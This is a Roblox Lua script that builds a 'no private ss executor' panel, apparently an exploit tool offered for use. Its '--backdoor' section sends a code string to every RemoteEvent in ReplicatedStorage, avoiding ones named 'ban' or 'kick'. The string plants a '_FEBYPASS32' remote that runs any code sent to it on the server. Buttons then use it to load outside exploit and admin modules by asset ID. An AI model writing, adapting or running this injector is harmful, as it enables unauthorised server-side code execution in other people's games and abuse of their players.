
--simple.

-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local clear = Instance.new("TextButton")
local exec = Instance.new("TextButton")
local unfe = Instance.new("TextButton")
local TextBox = Instance.new("TextBox")
local DestroyButton = Instance.new("TextButton")
local Injected = Instance.new("TextLabel")
local Frame2 = Instance.new("Frame")
local PolariaButton = Instance.new("TextButton")
local SSPButton = Instance.new("TextButton")
local RC7Button = Instance.new("TextButton")
local ExserButton = Instance.new("TextButton")
local TeamFatV17Button = Instance.new("TextButton")
local AltFrame = Instance.new("Frame")
local TextButton = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.168857574, 0, 0.182204574, 0)
Frame.Size = UDim2.new(0.660122454, 0, 0.676286519, 0)
Frame.Active = true
Frame.Draggable = true

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.380627573, 0, 0.0514138825, 0)
TextLabel.Size = UDim2.new(0.0995907262, 0, 0.0154241649, 0)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "by IEnes"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 14.000
TextLabel.TextTransparency = 0.500

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Size = UDim2.new(0.436562061, 0, 0.0668380484, 0)
TextLabel_2.Font = Enum.Font.Unknown
TextLabel_2.Text = "no private ss executor"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

clear.Name = "clear"
clear.Parent = Frame
clear.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
clear.BorderColor3 = Color3.fromRGB(0, 0, 0)
clear.BorderSizePixel = 2
clear.Position = UDim2.new(0.249658942, 0, 0.845758379, 0)
clear.Size = UDim2.new(0.208731234, 0, 0.128534704, 0)
clear.Font = Enum.Font.SourceSans
clear.Text = "Clear"
clear.TextColor3 = Color3.fromRGB(0, 0, 0)
clear.TextScaled = true
clear.TextSize = 14.000
clear.TextWrapped = true

exec.Name = "exec"
exec.Parent = Frame
exec.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
exec.BorderColor3 = Color3.fromRGB(0, 0, 0)
exec.BorderSizePixel = 2
exec.Position = UDim2.new(0.474761248, 0, 0.845758379, 0)
exec.Size = UDim2.new(0.208731234, 0, 0.128534704, 0)
exec.Font = Enum.Font.SourceSans
exec.Text = "Inject"
exec.TextColor3 = Color3.fromRGB(0, 0, 0)
exec.TextScaled = true
exec.TextSize = 14.000
exec.TextWrapped = true
exec.MouseButton1Click:Connect(function()
    Injected.Text = "🟢"
end)

unfe.Name = "unfe"
unfe.Parent = Frame
unfe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
unfe.BorderColor3 = Color3.fromRGB(0, 0, 0)
unfe.BorderSizePixel = 2
unfe.Position = UDim2.new(0.0163710769, 0, 0.845758379, 0)
unfe.Size = UDim2.new(0.208731234, 0, 0.128534704, 0)
unfe.Font = Enum.Font.SourceSans
unfe.Text = "Execute"
unfe.TextColor3 = Color3.fromRGB(0, 0, 0)
unfe.TextScaled = true
unfe.TextSize = 14.000
unfe.TextWrapped = true

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(85, 85, 85)
TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.BorderSizePixel = 2
TextBox.Position = UDim2.new(0.0163710769, 0, 0.100257069, 0)
TextBox.Size = UDim2.new(0.66712141, 0, 0.573264778, 0)
TextBox.Font = Enum.Font.ArialBold
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextSize = 14.000
TextBox.TextWrapped = true
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top

DestroyButton.Name = "DestroyButton"
DestroyButton.Parent = Frame
DestroyButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
DestroyButton.BackgroundTransparency = 1.000
DestroyButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
DestroyButton.BorderSizePixel = 0
DestroyButton.Position = UDim2.new(0.976807654, 0, 0, 0)
DestroyButton.Size = UDim2.new(0.023192361, 0, 0.0565552711, 0)
DestroyButton.Font = Enum.Font.SourceSans
DestroyButton.Text = "X"
DestroyButton.TextColor3 = Color3.fromRGB(255, 0, 0)
DestroyButton.TextScaled = true
DestroyButton.TextSize = 14.000
DestroyButton.TextWrapped = true
DestroyButton.MouseButton1Click:Connect(function()
    local ScreenGui = DestroyButton:FindFirstAncestorOfClass("ScreenGui") -- En yakın ScreenGui'yi bul
    if ScreenGui then
        ScreenGui:Destroy() -- ScreenGui'yi yok et
    else
        warn("ScreenGui bulunamadı!")
    end
end)

Injected.Name = "Injected?"
Injected.Parent = Frame
Injected.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Injected.BackgroundTransparency = 1.000
Injected.BorderColor3 = Color3.fromRGB(0, 0, 0)
Injected.BorderSizePixel = 0
Injected.Position = UDim2.new(0.0300136432, 0, 0.00514138816, 0)
Injected.Size = UDim2.new(-0.0300136432, 0, 0.0514138825, 0)
Injected.Font = Enum.Font.Unknown
Injected.Text = "🔴"
Injected.TextColor3 = Color3.fromRGB(0, 0, 0)
Injected.TextScaled = true
Injected.TextSize = 14.000
Injected.TextWrapped = true

Frame2.Name = "Frame2"
Frame2.Parent = Frame
Frame2.BackgroundColor3 = Color3.fromRGB(29, 29, 29)
Frame2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame2.BorderSizePixel = 2
Frame2.Position = UDim2.new(0.784447491, 0, 0.0822622105, 0)
Frame2.Size = UDim2.new(0.206002727, 0, 0.760925472, 0)

PolariaButton.Name = "PolariaButton"
PolariaButton.Parent = Frame2
PolariaButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
PolariaButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
PolariaButton.BorderSizePixel = 2
PolariaButton.Position = UDim2.new(0.350993365, 0, 0.0270270277, 0)
PolariaButton.Size = UDim2.new(0.642384112, 0, 0.0641891882, 0)
PolariaButton.Font = Enum.Font.Unknown
PolariaButton.Text = " polaria SS.txt"
PolariaButton.TextColor3 = Color3.fromRGB(0, 0, 0)
PolariaButton.TextScaled = true
PolariaButton.TextSize = 14.000
PolariaButton.TextWrapped = true

SSPButton.Name = "SSPButton"
SSPButton.Parent = Frame2
SSPButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
SSPButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
SSPButton.BorderSizePixel = 2
SSPButton.Position = UDim2.new(0.350993365, 0, 0.121621624, 0)
SSPButton.Size = UDim2.new(0.642384112, 0, 0.0641891882, 0)
SSPButton.Font = Enum.Font.Unknown
SSPButton.Text = "Secret Service Panel.txt"
SSPButton.TextColor3 = Color3.fromRGB(0, 0, 0)
SSPButton.TextScaled = true
SSPButton.TextSize = 14.000
SSPButton.TextWrapped = true

RC7Button.Name = "RC7Button"
RC7Button.Parent = Frame2
RC7Button.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
RC7Button.BorderColor3 = Color3.fromRGB(0, 0, 0)
RC7Button.BorderSizePixel = 2
RC7Button.Position = UDim2.new(0.350993365, 0, 0.212837845, 0)
RC7Button.Size = UDim2.new(0.642384112, 0, 0.0641891882, 0)
RC7Button.Font = Enum.Font.Unknown
RC7Button.Text = "RC7.exe"
RC7Button.TextColor3 = Color3.fromRGB(0, 0, 0)
RC7Button.TextScaled = true
RC7Button.TextSize = 14.000
RC7Button.TextWrapped = true

ExserButton.Name = "ExserButton"
ExserButton.Parent = Frame2
ExserButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ExserButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
ExserButton.BorderSizePixel = 2
ExserButton.Position = UDim2.new(0.357615888, 0, 0.30067569, 0)
ExserButton.Size = UDim2.new(0.642384112, 0, 0.0641891882, 0)
ExserButton.Font = Enum.Font.Unknown
ExserButton.Text = "Exser.txt"
ExserButton.TextColor3 = Color3.fromRGB(0, 0, 0)
ExserButton.TextScaled = true
ExserButton.TextSize = 14.000
ExserButton.TextWrapped = true

TeamFatV17Button.Name = "TeamFatV17Button"
TeamFatV17Button.Parent = Frame2
TeamFatV17Button.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TeamFatV17Button.BorderColor3 = Color3.fromRGB(0, 0, 0)
TeamFatV17Button.BorderSizePixel = 2
TeamFatV17Button.Position = UDim2.new(0.350993365, 0, 0.391891897, 0)
TeamFatV17Button.Size = UDim2.new(0.642384112, 0, 0.0641891882, 0)
TeamFatV17Button.Font = Enum.Font.Unknown
TeamFatV17Button.Text = "TeamFatV17.txt"
TeamFatV17Button.TextColor3 = Color3.fromRGB(0, 0, 0)
TeamFatV17Button.TextScaled = true
TeamFatV17Button.TextSize = 14.000
TeamFatV17Button.TextWrapped = true

AltFrame.Name = "AltFrame"
AltFrame.Parent = ScreenGui
AltFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
AltFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
AltFrame.BorderSizePixel = 0
AltFrame.Position = UDim2.new(0, 0, 0.858831704, 0)
AltFrame.Size = UDim2.new(0.0873559043, 0, 0.140820578, 0)

TextButton.Parent = AltFrame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 1.000
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Size = UDim2.new(1, 0, 1, 0)
TextButton.Font = Enum.Font.Unknown
TextButton.Text = "NPSS"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true
TextButton.MouseButton1Click:Connect(function()
    Frame.Visible = not Frame.Visible
end)

--backdoor
function execute(s)
	if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
		local Execute=game:GetService("JointsService"):FindFirstChild("_FEBYPASS32"):FireServer(tostring(s)) -- execute
	else
		warn("Failed to loadstring: Error 404")
	end
end
ExserButton.MouseButton1Click:Connect(function()
	execute("require(10868847330):pls('"..game.Players.LocalPlayer.Name.."')")
end)
PolariaButton.MouseButton1Click:Connect(function()
	execute("require(123255432303221):Pload('"..game.Players.LocalPlayer.Name.."')")
end)
RC7Button.MouseButton1Click:Connect(function()
	execute("require(12350030542).RC7('"..game.Players.LocalPlayer.Name.."')")
end)
SSPButton.MouseButton1Click:Connect(function()
	execute("require(16920033857)('"..game.Players.LocalPlayer.Name.."')")
end)
TeamFatV17Button.MouseButton1Click:Connect(function()
	execute("require(13772265165).TeamFatGUICrackedByLua('"..game.Players.LocalPlayer.Name.."')")
end)
exec.MouseButton1Click:Connect(function()
	local function b_G_V12(see)
		local a = function(ree)
			ree:FireServer([[
                    local folder = Instance.new('RemoteEvent')
                    folder.Name = "_FEBYPASS32"
                    folder.Parent = game:GetService("JointsService")
                    local loadstring = require(13684410229)
                    folder.OnServerEvent:Connect(function(_1,_2)
                       loadstring(_2)()
                    end)
                    ]]
			)
		end
		for i, v in pairs(see:GetChildren()) do
			--[[3 lines]]
			if v:IsA("RemoteEvent") then
				if not string.match(string.lower(v.Name), "ban") then
					if not string.match(string.lower(v.Name), "kick") then
						a(v)
					end
				end
			end
			--[[-3 lines]]
			b_G_V12(v) --[[test]]
		end
	end
	local Inject = b_G_V12(game:GetService("ReplicatedStorage"))
	local timetoken = 0
	local maxtime = 5
	repeat wait(0.1) timetoken += 0.1 until game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") or timetoken >= maxtime
	if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
		exec.Text = "Injected"
	end
end)
clear.MouseButton1Click:Connect(function()
	TextBox.Text = ""
end)
unfe.MouseButton1Click:Connect(function()
	if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
		local Execute=game:GetService("JointsService"):FindFirstChild("_FEBYPASS32"):FireServer(TextBox.Text) -- execute
	else
		warn("Failed to loadstring: Error 404")
	end
end)
